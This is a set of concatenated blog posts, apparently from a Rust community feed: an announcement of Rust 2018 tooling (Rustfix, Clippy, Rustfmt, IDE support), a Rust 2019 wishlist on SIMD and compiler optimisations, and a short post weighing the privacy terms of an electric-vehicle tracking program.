Tooling is an important part of what makes a programming language practical and productive. Rust has always had some great tools (Cargo in particular has a well-deserved reputation as a best-in-class package manager and build tool), and the 2018 edition includes more tools which we hope further improve Rust users' experience.

In this blog post I'll cover Clippy and Rustfmt – two tools that have been around for a few years and are now stable and ready for general use. I'll also cover IDE support – a key workflow for many users which is now much better supported. I'll start by talking about Rustfix, a new tool which was central to our edition migration plans.

Rustfix

Rustfix is a tool for automatically making changes to Rust code. It is a key part of our migration story for the 2018 edition, making the transition from 2015 to 2018 editions much easier, and in many cases completely automatic. This is essential, since without such a tool we'd be much more limited in the kinds of breaking changes users would accept.

A simple example:

trait Foo {
    fn foo(&self, i32);
}

The above is legal in Rust 2015, but not in Rust 2018 (method arguments must be made explicit). Rustfix changes the above code to:

trait Foo {
    fn foo(&self, _: i32);
}

For detailed information on how to use Rustfix, see these instructions. To transition your code from the 2015 to 2018 edition, run cargo fix --edition.

Rustfix can do a lot, but it is not perfect. When it can't fix your code, it will emit a warning informing you that you need to fix it manually. We're continuing to work to improve things.

Rustfix works by automatically applying suggestions from the compiler. When we add or improve the compiler's suggestion for fixing an error or warning, then that improves Rustfix. We use the same information in an IDE to give quick fixes (such as automatically adding imports).

Thank you to Pascal Hertleif (killercup), Oliver Scherer (oli-obk), Alex Crichton, Zack Davis, and Eric Huss for developing Rustfix and the compiler lints which it uses.

Clippy

Clippy is a linter for Rust. It has numerous (currently 290!) lints to help improve the correctness, performance and style of your programs. Each lint can be turned on or off (allow), and configured as either an error (deny) or warning (warn).
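
Configuring those levels is done with ordinary lint attributes. A minimal sketch, using the clippy::all group and the iter_next_loop lint discussed below (the special_case function is just a placeholder):

// Crate level: treat Clippy's default lint set as hard errors.
#![deny(clippy::all)]

// Item level: opt one function out of a single lint.
#[allow(clippy::iter_next_loop)]
fn special_case() {
    // ...
}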

An example: the iter_next_loop lint checks that you haven't made an error by iterating on the result of next rather than the object you're calling next on (this is an easy mistake to make when changing a while let loop to a for loop).

for x in y.next() {
    // ...
}

will give the error

error: you are iterating over `Iterator::next()` which is an Option; this will compile but is probably not what you want
 --> src/main.rs:4:14
  |
4 |     for x in y.next() {
  |              ^^^^^^^^
  |
  = note: #[deny(clippy::iter_next_loop)] on by default
  = help: for further information visit https://rust-lang.github.io/rust-clippy/master/index.html#iter_next_loop
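
The fix, for this hypothetical snippet, is either to iterate over y itself or to take just the first item explicitly; the two forms below are alternatives, not meant to run one after the other:

// Loop over the iterator itself...
for x in y {
    // ...
}

// ...or, if only the first element was intended:
if let Some(x) = y.next() {
    // ...
}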

Clippy works by extending the Rust compiler. The compiler has support for a few built-in lints; Clippy uses the same mechanisms but with lots more lints. That means Clippy's error/warning format should be familiar, that you should be able to apply Clippy's suggestions in your IDE (or using Rustfix), and that the lints are reliable and accurate.

With Rust 1.31 and the 2018 edition, Clippy is available on stable Rust and has backwards compatibility guarantees (if it had a version number, it would be 1.0). Clippy has the same stability guarantees as rustc: new lints may be added, and lints may be modified to add more functionality, however lints may never be removed (only deprecated). This means that code that compiles with Clippy will continue to compile with Clippy (provided there are no lints set to error via deny), but may throw new warnings.

Clippy can be installed using rustup component add clippy, then use it with cargo clippy. For more information, including how to run it in your CI, see the repo readme.

Thank you Clippy team (Pascal Hertleif (killercup), Oliver Scherer (oli-obk), Manish Goregaokar (manishearth), and Andre Bogus (llogiq))!

Rustfmt

Rustfmt is a tool for formatting your source code. It takes arbitrary, messy code and turns it into neat, beautifully styled code.
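
For example, given a hastily written one-liner, cargo fmt with default settings produces roughly the following (exact output depends on the Rustfmt version; the add function here is my own toy example):

// Hastily written: fn add(a:i32,b:i32)->i32{a+b}
// After `cargo fmt` with default settings, it becomes:
fn add(a: i32, b: i32) -> i32 {
    a + b
}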

Automatically formatting saves you time and mental energy. You don't need to worry about style as you code. If you use Rustfmt in your CI (cargo fmt --check), then you don't need to worry about code style in review. By using a standard style you make your project feel more familiar for new contributors and spare yourself arguments about code style. Rust's standard code style is the Rustfmt default, but if you must, then you can customize Rustfmt extensively.

Rustfmt 1.0 is part of the 2018 edition release. It should work on all code and will be backwards compatible until the 2.0 release. By backwards compatible we mean that if your code is formatted (i.e., excluding bugs which prevent any formatting or code which does not compile), it will always be formatted in the same way. This guarantee only applies if you use the default formatting options.

Rustfmt is not done. Formatting is not perfect; in particular we don't touch comments and string literals, and we are pretty limited with macro definitions and some macro uses. We're likely to improve formatting here, but you will need to opt in to these changes until there is a 2.0 release. We are planning on having a 2.0 release. Unlike Rust itself, we think it's a good idea to have a breaking release of Rustfmt, and expect that to happen some time in late 2019.

To install Rustfmt, use rustup component add rustfmt. To format your project, use cargo fmt. You can also format individual files using rustfmt (though note that by default rustfmt will format nested modules). You can also use Rustfmt in your editor or IDE using the RLS (see below; no need to install rustfmt for this, it comes as part of the RLS). We recommend configuring your editor to run rustfmt on save. Not having to think about formatting at all as you type is a pleasant change.

Thank you Seiichi Uchida (topecongiro), Marcus Klaas, and all the Rustfmt contributors!

IDE support

For many users, their IDE is the most important tool. Rust IDE support has been in the works for a while and is a highly demanded feature. Rust is now supported in many IDEs and editors: IntelliJ, Visual Studio Code, Atom, Sublime Text, Eclipse (and more...). Follow each link for installation instructions.

Editor support is powered in two different ways: IntelliJ uses its own compiler, the other editors use the Rust compiler via the Rust Language Server (RLS). Both approaches give a good but imperfect IDE experience. You should probably choose based on which editor you prefer (although if your project does not use Cargo, then you won't be able to use the RLS).

All these editors come with support for standard IDE functions including 'go to definition', 'find all references', code completion, renaming, and reformatting.

The RLS has been developed by the Rust dev tools team; it is a bid to bring Rust support to as many IDEs and editors as possible. It directly uses Cargo and the Rust compiler to provide accurate information about a program. Due to performance constraints, code completion is not yet powered by the compiler and therefore can be a bit more hit and miss than other features.

Thanks to the IDEs and editors team for work on the RLS and the various IDEs and extensions (alexheretic, autozimu, jasonwilliams, LucasBullen, matklad, vlad20012, Xanewok), Jonathan Turner for helping start off the RLS, and phildawes, kngwyu, jwilm, and the other Racer contributors for their work on Racer (the code completion component of the RLS)!

The future

We're not done yet! There's lots more we think we can do in the tools domain over the next year or so.

We've been improving Rust debugging support in LLDB and GDB, and there is more in the works. We're experimenting with distributing our own versions with Rustup and making debugging from your IDE easier and more powerful.

We hope to make the RLS faster, more stable, and more accurate; including using the compiler for code completion.

We want to make Cargo a lot more powerful: Cargo will handle compiled binaries as well as source code, which will make building and installing crates faster. We will support better integration with other build systems (which in turn will enable using the RLS with more projects). We'll add commands for adding and upgrading dependencies, and to help with security audits.

Rustdoc will see improvements to its source view (powered by the RLS) and links between documentation for different crates.

There's always lots of interesting things to work on. If you'd like to help, chat to us on GitHub or Discord.

Henri SivonenRust 2019

The Rust team encouraged people to write blog posts reflecting on Rust in 2018 and proposing goals and directions for 2019. Here’s mine.

This is knowingly, blatantly focused on the niche that is immediately relevant to my work. I don't even pretend that this represents any kind of overall big picture.

Rust in 2018

In my Rust 2018 post, I had these items:

  • simd-Style SIMD
  • Rust bool in FFI is C _Bool
  • Debug Info for Code Expanded from Macros
  • Non-Nightly Benchmarking
  • GUI for rr replay
  • Tool for Understanding What LLVM Did with a Given Function

As far as I know, the kind of tool I wanted for understanding what LLVM did does not exist in a way that does not involve extracting a minimized case with the dependencies for copying and pasting to rust.godbolt.org. After one goes through the effort of making a Compiler Explorer-compatible extract, the tool is great, though. I don't know if the feature existed a year ago, but Compiler Explorer now has tooltips that explain what assembly instructions do, so I'd rate this old wish half fulfilled. (Got the asm explanations but didn't get to avoid manually extracting the code under scrutiny.)

I’ve been told that GUIs for rr exist and work. However, I got stuck with cgdb (launch with rr replay --debugger=/usr/bin/cgdb --no-redirect-output; thanks to Thomas McGuire and David Faure of KDAB for that incantation), because it has worked well for me, and the Python+browser front end that was recommended to me did not work right away. (I should try again.)

Also, Rust bool is now documented to have size_of 1 and the proposal to make the compiler complain about bool in FFI has been abandoned. 🎉

Cool Things in 2018 That I Did Not Ask For

Looking back at 2018 beyond what I wrote in my Rust 2018 post, I am particularly happy about these features making it to non-nightly Rust:

Non-lexical lifetimes are a huge boost for the ergonomics of the language. I hope the people who previously turned away from Rust due to the borrow checker will be willing to try again.

align_to makes it easier to write more obviously correct optimizations that look at byte buffers one register at a time. A bit disappointingly, the previous sentence cannot say “safe code”, because align_to is still unsafe. It would be nice if there was a safe version with a trait bound requiring types all of whose bit patterns are defined, and then having primitive integers and SIMD vectors with primitive integer lane types implement the relevant marker trait. (I.e. exposing endianness would be considered safe like integer overflow is considered safe.)

I expect chunks_exact to be relevant to writing safe SIMD code.
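
To make those two APIs concrete, here is a minimal sketch under my own assumptions; the all_ascii and sum_pairs helpers are invented here, and the register-at-a-time trick assumes looking at the buffer in native endianness is acceptable:

fn all_ascii(bytes: &[u8]) -> bool {
    // align_to gives an unaligned prefix, a &[u64] view of the aligned
    // middle, and an unaligned suffix. It is unsafe because it
    // reinterprets the underlying bytes.
    let (prefix, words, suffix) = unsafe { bytes.align_to::<u64>() };
    prefix.iter().all(|&b| b < 0x80)
        && words.iter().all(|&w| (w & 0x8080_8080_8080_8080) == 0)
        && suffix.iter().all(|&b| b < 0x80)
}

fn sum_pairs(bytes: &[u8]) -> u32 {
    // chunks_exact yields only full-length chunks; the leftover bytes
    // are available afterwards via remainder().
    let mut chunks = bytes.chunks_exact(2);
    let mut total: u32 = chunks
        .by_ref()
        .map(|pair| u32::from(pair[0]) + u32::from(pair[1]))
        .sum();
    total += chunks.remainder().iter().map(|&b| u32::from(b)).sum::<u32>();
    total
}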

Carry-Overs from 2018

Some items from a year ago are not done.

Non-Nightly Benchmarking

The library support for the cargo bench feature has been in the state “basically, the design is problematic, but we haven’t had anyone work through those issues yet” since 2015. It’s a useful feature nonetheless. Like I said a year ago, it’s time to let go of the possibility of tweaking it for elegance and just let users use it on non-nightly Rust.
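
For reference, the nightly-only feature in question looks roughly like this (bench_parse and the parsing work inside the closure are placeholders of my own):

#![feature(test)]
extern crate test;

use test::Bencher;

#[bench]
fn bench_parse(b: &mut Bencher) {
    // The closure is run repeatedly and timed by `cargo bench`.
    b.iter(|| "12345".parse::<u32>().unwrap());
}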

Debug Info for Code Expanded from Macros

No news on this RFC.

Portable SIMD

A lot of work has been done on this topic in the past year, which is great. Thank you! Rather than continuing with the design of the simd crate, the design and implementation are proceeding in the packed_simd crate. I wish that packed_simd, with its into_bits feature enabled, becomes core::simd / std::simd and becomes available on non-nightly Rust in 2019.

A year ago I wished that core::arch / std::arch did not become available on non-nightly Rust before core::simd / std::simd out of concern that vendor-specific SIMD shipping before portable SIMD would unnecessarily skew the ecosystem towards the incumbent (Intel). I think it is too early to assess if the concern was valid.

New Items

In addition to reiterating the old items, I do have some new ones, too.

Compiling the Standard Library with User Settings

At present, when you compile a Rust artifact, your own code and the crates your code depends on get compiled, but the standard library is taken as a pre-compiled library. This is especially problematic with SIMD functionality moving to the standard library.

32-bit CPU architectures like x86, ARM, PowerPC and MIPS introduced SIMD during the evolution of the instruction set architecture. Therefore, unlike in the case of x86_64, aarch64 and little-endian POWER, generic 32-bit targets cannot assume that SIMD support is present. If you, as an application developer, decide to scope your application to 32-bit CPUs recent enough that you can assume SSE2/NEON/AltiVec/MSA to be present, and you want to use packed_simd / std::simd to use the SIMD capability of the CPU, you are going to have a bad time if the Rust standard library has been compiled with the assumption that the SIMD unit does not exist.
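
To illustrate (a hypothetical function of my own, not actual standard-library code): which of these branches exists is decided when the crate containing the code is compiled, so a precompiled standard library keeps whatever was chosen when it was built, regardless of the target features you enable for your own code.

#[cfg(target_feature = "sse2")]
fn fill(buf: &mut [u8], value: u8) {
    // The SIMD path would go here.
    for b in buf.iter_mut() {
        *b = value;
    }
}

#[cfg(not(target_feature = "sse2"))]
fn fill(buf: &mut [u8], value: u8) {
    // Scalar fallback path.
    for b in buf.iter_mut() {
        *b = value;
    }
}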

For 32-bit x86 and SSE2 Rust solves this by providing two targets: i586 without SSE2 and i686 with SSE2. Currently, the ARMv7 (both Thumb2 and non-Thumb2) targets are without NEON. I am hoping to introduce Thumb2+NEON variants in 2019.

Adding targets won’t scale, though. For example, even in the x86_64 case you might determine that it is OK for your application to require a CPU that supports SSSE3, which is relevant to portable SIMD because it provides arbitrary shuffling as a single instruction. (At present, the SSE2 shuffle generation back end of LLVM misses even some seemingly obvious cases, such as transposing each of the eight pairs of lanes in a u8x16 by shifting lane-wise by 8 in both directions in a u16x8 interpretation and bitwise ORing the results.)
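
In scalar form (a sketch of my own to make the pattern concrete), the operation in question looks like this; the wish is for LLVM to recognize the corresponding u8x16 shuffle and lower it this way on plain SSE2:

fn swap_adjacent_bytes(lanes: [u16; 8]) -> [u16; 8] {
    let mut out = [0u16; 8];
    for (o, &x) in out.iter_mut().zip(lanes.iter()) {
        // Swap the two bytes within each u16 lane.
        *o = (x << 8) | (x >> 8);
    }
    out
}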

I hope that in 2019, Cargo gains the Xargo functionality of being able to compile the standard library with the same target feature settings that are used for compiling the user code and the crate dependencies.

Better Integer Range Analysis for Bound Check Elision

Currently, LLVM only elides the bound check when indexing into a slice if you’ve previously made the most obvious comparison between the index and the slice length. For example:

if i < slice.len() {
    slice[i] // bound check elided
}

Pretty much anything more complex results in a bound check branch, and the performance effect is measurable when it happens in the innermost loop. I hope that rustc and LLVM will do better in 2019. Specifically:

  • LLVM should become able to eliminate the second check in code like:

    if a + C < b {
        if a + D < b {
            // ...
        }
    }

    …if a, b, C, and D are all of type usize, a and b are run-time variables, and C and D are compile-time constants such that D <= C and a + C can be proven at compile time not to overflow.

  • LLVM should become able to figure out that a + C didn’t overflow if it was written as a.checked_add(C).unwrap() and execution continued to the second check.

  • rustc should become able to tell LLVM that a small constant added to slice.len() or a value previously checked to be less than slice.len() does not overflow by telling LLVM to assume that the maximum possible value for a slice length is quite a bit less than usize::max_value().

    Since a slice has to represent a possible allocation, the maximum possible value for len() is not usize::max_value(). On 64-bit platforms, rustc should tell LLVM that the usize returned by len() is capped by the number of bits the architecture actually uses for the virtual address space, which is lower than 64 bits. I’m not sure if Rust considers it permissible for 32-bit PAE processes to allocate more than half the address space in a single allocation (it seems like a bad thing to allow in terms of pointer difference computations, but it looks like glibc has at least in the past allowed such allocations), but even if it is considered permissible, it should be possible to come up with a slice size limit by observing that a slice cannot fill the whole address space, because at least the stack size and the size of the code for a minimal program have to be reserved.

  • LLVM should become able to figure out that if a: ufoo and a >= C, then a - C < ufoo::max_value() + 1 - C and, therefore, indexing with a - C into an array whose length is ufoo::max_value() + 1 - C does not need a bound check. (Where C is a compile-time constant; a minimal sketch of this pattern follows the list.)
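
To make the last pattern concrete, here is a minimal sketch with hypothetical names (OFFSET plays the role of C): for a u8 index known to be at least OFFSET, a - OFFSET is at most 255 - OFFSET, so indexing a table of 256 - OFFSET entries is always in bounds and should not need a bound check.

const OFFSET: u8 = 0x20;
static TABLE: [u16; 224] = [0; 224]; // 224 == 256 - 0x20

fn look_up(a: u8) -> Option<u16> {
    if a >= OFFSET {
        // In bounds by the reasoning above; today this may still emit a bound check.
        Some(TABLE[usize::from(a - OFFSET)])
    } else {
        None
    }
}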

likely() and unlikely() for Plain if Branch Prediction Hints

The issue for likely() and unlikely() has stalled on the observation that they don’t generalize to if let, match, etc. They would work for plain if, though. Let’s have them for plain if in 2019 even if if let, match, etc., remain unaddressed for now.
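
For plain if, the usage would look something like this sketch; today likely() is a nightly-only intrinsic behind #![feature(core_intrinsics)] rather than a stable API:

#![feature(core_intrinsics)]
use std::intrinsics::likely;

fn first_or_zero(slice: &[u8]) -> u8 {
    // Hint to the compiler that the slice is usually non-empty.
    if likely(!slice.is_empty()) {
        slice[0]
    } else {
        0
    }
}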

No LTS

Rust has successfully delivered on “stability without stagnation” to the point that Red Hat has announced Rust updates for RHEL on a 3-month frequency instead of Rust getting stuck for the duration of the lifecycle of a RHEL version. That is, contrary to popular belief, the “stability” part works without an LTS. At this point, doing an LTS would be a strategic blunder that would jeopardize the “without stagnation” part.

Andy McKayCar Tracking

This week I received an email from the Clean Energy Vehicle program. They'd like us to install a device in our Tesla that tracks us:

"By understanding when and where EVs charge to how much energy is consumed, you can help pave the way for future drivers by ensuring that the power system is ready for a plug-in future."

The program details are here.

"GPS information is collected, but not shared at the individual level. The data is collected and stored but no one outside of FleetCarma will see an individual’s location data."

Alright so who's FleetCarma? Let's look into the terms:

"Data Collected by the C2 Device and Privacy... drive start date and time, duration of trip, trip distance... GPS coordinates of the drive,"

"With the specific exclusion of GPS coordinates when driving, an anonymized subset of the data outlined above may be shared with the Province and BC Hydro and other third party suppliers"

"GPS coordinates during driving will not be shared with any Program partners or third party suppliers except in both anonymous and aggregate form to inhibit extraction of any individual driving behaviour."

Not sure who those Program partners or third party suppliers are, but GeoTab uses some sub-processors.

FleetCarma will share your information:

"To affiliated entities of CrossChasm Technologies Inc., including wholly owned subsidiaries" (Whomever that is)

"When we’re legally required to provide data, such as in response to a subpoena in a civil lawsuit."

It's nice to note, though:

"You may also request that your Personal Information be deleted. FleetCarma will promptly respond to your request within 30 days"

At this point I can surmise that:

  • FleetCarma will know all the trips I make in the car.

  • FleetCarma can be subpoenaed to give up that information.

  • FleetCarma can be hacked to give up all that information.

Normally this would be a simple "hell no". But I care greatly about electric cars and the infrastructure, and this has put me in a bind. The privacy problem here is one that I simply can't get around.